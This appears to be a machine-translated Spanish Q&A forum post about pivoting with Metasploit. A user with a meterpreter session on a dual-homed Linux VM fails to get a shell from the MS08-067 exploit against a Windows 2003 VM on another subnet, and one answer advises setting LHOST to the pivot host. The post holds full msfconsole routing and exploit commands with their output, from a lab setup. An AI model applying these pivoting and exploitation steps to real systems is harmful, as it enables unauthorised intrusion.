Girar con Metasploit

3

Estoy tratando de explotar una máquina virtual de Windows en una subred diferente detrás de una máquina virtual de Linux de casa dual donde ya tengo un shell. Para mantenerlo simple, tengo un shell meterpreter reverse_tcp en la VM de Linux (192.168.47.144) y la VM de Windows (192.168.128.133) es 2003 y vulnerable a MS08-067 (probé esto directamente). Por último, la VM de Linux definitivamente puede afectar al servicio SMB en la VM de Windows.

ubuntu:~$ ip -o addr show | grep -o '192.168.47.144' && nc -nvv 192.168.128.133 445
192.168.47.144
Connection to 192.168.128.133 445 port [tcp/*] succeeded!

El shell meterpreter reverse_tcp en la máquina virtual Linux se vuelve a conectar en el puerto 5555 para que no haya conflicto con el número de puerto.

[*] Sending stage (826872 bytes) to 192.168.47.144
[*] Meterpreter session 2 opened (192.168.47.136:5555 -> 192.168.47.144:47395) at 2017-10-08 11:21:30 -0500

msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > route add 192.168.128.0 255.255.255.0 2
[*] Route added
msf exploit(ms08_067_netapi) > route

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.128.0      255.255.255.0      Session 2

[*] There are currently no IPv6 routes defined.
msf exploit(ms08_067_netapi) > set RHOST 192.168.128.133
RHOST => 192.168.128.133
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.47.136:4444 
[*] 192.168.128.133:445 - Automatically detecting the target...
[*] 192.168.128.133:445 - Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
[*] 192.168.128.133:445 - We could not detect the language pack, defaulting to English
[*] 192.168.128.133:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.128.133:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

Adicionalmente, le di a esto una ejecución con LHOST 0.0.0.0 así como con LHOST 192.168.128.132 (la dirección de subred .128 de la VM de Linux), pero tampoco hay shell allí. ¿Qué me estoy perdiendo?

También intenté hacer esto manualmente a través del puerto SSH hacia adelante como se ve en enlace y terminé Con el mismo resultado. La vulnerabilidad llega a la máquina virtual de Windows pero no se abre ninguna sesión.

Estas son las publicaciones principales a las que me he referido.

  1. enlace
  2. enlace
  3. enlace
pregunta B-MO 09.10.2017 - 01:47
fuente

1 respuesta

0

Cuando use la tunelización a través de rutas de meterpreter en Metasploit, su lhost se convertirá en su primer objetivo.

Entonces, en este caso, su LHOST debe configurarse como: 192.168.47.144

Intenta eso.

    
respondido por el standarduser 25.10.2018 - 16:53
fuente

Lea otras preguntas en las etiquetas